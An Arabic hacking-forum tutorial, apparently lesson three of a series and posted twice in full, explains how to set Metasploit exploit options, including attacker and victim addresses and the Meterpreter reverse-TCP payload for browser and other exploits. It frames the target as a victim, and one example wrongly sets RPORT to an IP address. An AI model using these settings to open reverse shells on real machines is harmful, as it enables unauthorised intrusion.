ViRuS_Ra3cH
19/03/2010, 12:02
بسم الله الرحم الرحيم
السلام عليكم ورحمة الله وبركاتة
اليوم درسنا الدرس الثالث ان شاء الله رح يكون عن ادخال معلومات الهدف في خيارات الثغرة لأستغلالها بالشكل الصحيح
نبدأ على طول على بركة الله .. للعلم هذا الدرس اساسي في اعتمادك على الاختراق وهو يعتمد في عملية الاستهداف على 99% اذا لم يكن 100%
اول امر وهو
set
تطرقنا له في الدرس الثاني .. لأظهار خيارات الثغرة show options وهذا الامر موضح بالدرس السابق ..وبهذا الامر تستطيع معرفة ماذا ستستعملانظر تحت v_v
نشوف الآن كيف يكون الامر
set LHOST 192.168.1.151
يستخدم لادخال اي بي جهازنا ضمن خيارات الثغرة لتصنت عن طريقة او وصول تبليغ
set RHOST 192.168.5.110
يستخدم هذا ايضا لادخال اي بي جهاز الضحية يعني باختصار ي بي الهدف
set LPORT 4444
ادخال البورت الذي ستستخدمه في التصنت ولك الحق بوضع اي رقم بورت تريده وهذا يستخجم في حال انت تستخدم بايلود اتصال عكسي او ثغرة اتصال عكسي reverse
set RPORT 192.168.5.151
لأدخال بورت الهدف بتاع الضحية الى خيارات الثغرة ويستخدم هذا في حال الاتصال المباشر bind
###
set PAYLOAD windows/meterpreter/reverse_tcp
يستخدم لتحديد البايلود الذي نريد استخدامه في عملية الاختراق وان شاء الله رح يكون درس كامل عن هذه البايلود لخطورتها وسهولة استعمالها وقوتها
set PATH /vb/
هنا لتحديد المسار انا وضعت vb لمثال وانما في بعض تطلب مسارات اخرى لكن اللي يهمني هو الدال عليه وهو PATH وهو المسار المراد استخدام بشكل عام بأي ثغرة سواء كان تحديد مسار سكربت او تحديد ملف لأستعماله في الاختراق سواء سيرفر او غيره
set VHOST host.com
هنا لتحديد رابط الاستضافة في حال كنا نستهدف موقع نادرا ما تلاقي هذا الخيار
set SRVPORT 80
يستخدم لأدخال البورت في حال استخدام احد ثغرات المتصفح .. وهذا الخيار لا ياتي الا في ثغرات المتصفح browser هذا على حسب استعمالي اني لم اجدها في اي ثغرات اخرى غير ثغرات المتصفح وفي هذه الحالة فيك تضع 80 او 8080 او اي بورت غيره
ويلزم يكون البورت الذي تريد وضعه يكون مفتوح عندك ويفضل وضع 80 لانه للمتصف http وانت الان تتصفح انظر فوق اول رابط الموقع مكتوب http وهو بورت 80 اذا اكيد يكون مفتوح تلقائي يعني ما بتشوفه مفتوح بالرواتر هذا على حسب استنباطي
set SRVHOST 0.0.0.0
يسخدم ايضا هذا الخيار فقط تلقاه في ثغرات المتصفح هذا تضع به الاي بي جهازك.. واذا تركته مثل ما هو SRVHOST 0.0.0.0 رح يتم الاستغلال تلقائي يعني وضع اي بي جهازك تلقائي فيفضل ان لا تعدل عليه لانه رح يتم تلقائي وضع اي بي جهازك يعني رح تشوفه في خيارات الثغرة هكذا 0.0.0.0
set URIPATH arhacker.html
يستخدم هذا الامر لوضع رابط وايضا هذا يستخدم في ثغرات المتصفح يعني يمكن ما تلاقيه بثغرات اخرى << لست متذكر اني لم اجده في ثغرات اخرى
الى هنا ينتهي الدرس بحمد الله
اي استفسار ضعه هنا وان شاء الله يتم الرد واذا لم اكن موجود فألاعضاء ما يقصرون معك بأذن الله
ان شاء الله الدرس الرابع رح اتطرق لانواع البايلود واهميتها ووظيفتها
####
تحياتي
لا للاحتكار
المجهوول
السلام عليكم ورحمة الله وبركاتة
اليوم درسنا الدرس الثالث ان شاء الله رح يكون عن ادخال معلومات الهدف في خيارات الثغرة لأستغلالها بالشكل الصحيح
نبدأ على طول على بركة الله .. للعلم هذا الدرس اساسي في اعتمادك على الاختراق وهو يعتمد في عملية الاستهداف على 99% اذا لم يكن 100%
اول امر وهو
set
تطرقنا له في الدرس الثاني .. لأظهار خيارات الثغرة show options وهذا الامر موضح بالدرس السابق ..وبهذا الامر تستطيع معرفة ماذا ستستعملانظر تحت v_v
نشوف الآن كيف يكون الامر
set LHOST 192.168.1.151
يستخدم لادخال اي بي جهازنا ضمن خيارات الثغرة لتصنت عن طريقة او وصول تبليغ
set RHOST 192.168.5.110
يستخدم هذا ايضا لادخال اي بي جهاز الضحية يعني باختصار ي بي الهدف
set LPORT 4444
ادخال البورت الذي ستستخدمه في التصنت ولك الحق بوضع اي رقم بورت تريده وهذا يستخجم في حال انت تستخدم بايلود اتصال عكسي او ثغرة اتصال عكسي reverse
set RPORT 192.168.5.151
لأدخال بورت الهدف بتاع الضحية الى خيارات الثغرة ويستخدم هذا في حال الاتصال المباشر bind
###
set PAYLOAD windows/meterpreter/reverse_tcp
يستخدم لتحديد البايلود الذي نريد استخدامه في عملية الاختراق وان شاء الله رح يكون درس كامل عن هذه البايلود لخطورتها وسهولة استعمالها وقوتها
set PATH /vb/
هنا لتحديد المسار انا وضعت vb لمثال وانما في بعض تطلب مسارات اخرى لكن اللي يهمني هو الدال عليه وهو PATH وهو المسار المراد استخدام بشكل عام بأي ثغرة سواء كان تحديد مسار سكربت او تحديد ملف لأستعماله في الاختراق سواء سيرفر او غيره
set VHOST host.com
هنا لتحديد رابط الاستضافة في حال كنا نستهدف موقع نادرا ما تلاقي هذا الخيار
set SRVPORT 80
يستخدم لأدخال البورت في حال استخدام احد ثغرات المتصفح .. وهذا الخيار لا ياتي الا في ثغرات المتصفح browser هذا على حسب استعمالي اني لم اجدها في اي ثغرات اخرى غير ثغرات المتصفح وفي هذه الحالة فيك تضع 80 او 8080 او اي بورت غيره
ويلزم يكون البورت الذي تريد وضعه يكون مفتوح عندك ويفضل وضع 80 لانه للمتصف http وانت الان تتصفح انظر فوق اول رابط الموقع مكتوب http وهو بورت 80 اذا اكيد يكون مفتوح تلقائي يعني ما بتشوفه مفتوح بالرواتر هذا على حسب استنباطي
set SRVHOST 0.0.0.0
يسخدم ايضا هذا الخيار فقط تلقاه في ثغرات المتصفح هذا تضع به الاي بي جهازك.. واذا تركته مثل ما هو SRVHOST 0.0.0.0 رح يتم الاستغلال تلقائي يعني وضع اي بي جهازك تلقائي فيفضل ان لا تعدل عليه لانه رح يتم تلقائي وضع اي بي جهازك يعني رح تشوفه في خيارات الثغرة هكذا 0.0.0.0
set URIPATH arhacker.html
يستخدم هذا الامر لوضع رابط وايضا هذا يستخدم في ثغرات المتصفح يعني يمكن ما تلاقيه بثغرات اخرى << لست متذكر اني لم اجده في ثغرات اخرى
الى هنا ينتهي الدرس بحمد الله
اي استفسار ضعه هنا وان شاء الله يتم الرد واذا لم اكن موجود فألاعضاء ما يقصرون معك بأذن الله
ان شاء الله الدرس الرابع رح اتطرق لانواع البايلود واهميتها ووظيفتها
####
تحياتي
لا للاحتكار
المجهوول